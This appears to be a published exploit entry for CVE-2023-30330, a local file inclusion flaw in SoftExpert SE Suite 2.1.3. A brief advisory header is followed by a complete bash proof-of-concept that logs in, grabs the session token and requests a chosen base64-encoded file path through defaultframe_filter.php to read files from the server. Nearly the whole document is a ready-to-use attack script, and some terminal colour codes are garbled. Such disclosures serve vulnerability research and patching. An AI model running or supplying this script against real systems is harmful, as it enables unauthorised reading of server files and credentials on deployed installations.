SoftExpert Suite version 2.1.3 suffers from a local file inclusion vulnerability.
advisories | CVE-2023-30330
# Exploit Title: SoftExpert (SE) Suite v2.1.3 - Local File Inclusion
# Date: 27-04-2023
# Exploit Author: Felipe Alcantara (Filiplain)
# Vendor Homepage: https://www.softexpert.com/
# Version: 2.0 < 2.1.3
# Tested on: Kali Linux
# CVE : CVE-2023-30330
# SE Suite versions tested: 2.0.15.31, 2.0.15.115
# https://github.com/Filiplain/LFI-to-RCE-SE-Suite-2.0
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30330
#!/bin/bash
# Usage: ./lfi-poc.sh <domain> <username> <password> <File Path>
target=$1
u=$2
p=$3
file=$(echo -n "$4"|base64 -w 0)
end="�33[0me[0m"
red="e[0;31m�33[1m"
blue="e[0;34m�33[1m"
echo -e "n$4 : $filen"
echo -e "${blue}nGETTING SESSION COOKIE${end}"
cookie=$(curl -i -s -k -X $'POST'
-H "Host: $target" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 213' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/login?page=home" -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' -H $'Te: trailers' -H $'Connection: close'
-b $'language=1; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy'
--data-binary "json=%7B%22AuthenticationParameter%22%3A%7B%22language%22%3A3%2C%22hashGUID%22%3Anull%2C%22domain%22%3A%22%22%2C%22accessType%22%3A%22DESKTOP%22%2C%22login%22%3A%22$u%22%2C%22password%22%3A%22$p%22%7D%7D"
"https://$target/softexpert/selogin"|grep se-authentication-token |grep "=" |cut -d ';' -f 1|sort -u|cut -d "=" -f 2)
echo "cookie: $cookie"
function LFI () {
curl -s -k -X $'POST'
-H "Host: $target" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/workspace?page=home" -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Te: trailers' -H 'Connection: close'
-b "se-authentication-token=$cookie; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy"
--data-binary "action=4&managerName=lol&managerPath=$file&className=ZG9jX2RvY3VtZW50X2FkdmFuY2VkX2dyb3VwX2ZpbHRlcg%3D%3D&instantiate=false&loadJquery=false"
"https://$target/se/v42300/generic/gn_defaultframe/2.0/defaultframe_filter.php"
}
echo -e "${blue}nExploiting LFI:${end}"
LFI
function logout () {
curl -i -s -k -X $'POST'
-H "Host: $target" -H $'Content-Length: 0' -H $'Sec-Ch-Ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'X-Requested-With: XMLHttpRequest' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' -H $'Sec-Ch-Ua-Platform: "Linux"' -H "Origin: https://$target" -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H "Referer: https://$target/softexpert/workspace?page=home" -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close'
-b "se-authentication-token=$cookie; language=1; _ga=GA1.3.1890963078.1675081150; twk_uuid_5db840c5e4c2fa4b6bd8f89a=%7B%22uuid%22%3A%221.bJmDVb5PBlMumGNq2QO9gxk5hjdc6sp2pgENmao2hxHntg00r0qllmuXqCXTWG9uYLT1GkRDFuPY4ir63UIEJEXSS0pIJi8YlIvsB4edfrG1RTcS3CPr58feQBNf1%22%2C%22version%22%3A3%2C%22domain%22%3A%22$target%22%2C%22ts%22%3A1675081174571%7D; mode=deploy"
"https://$target/softexpert/selogout"
}
echo -e "${blue}nLogging out${end}"
logout >/dev/null
echo -e "nnDone!"
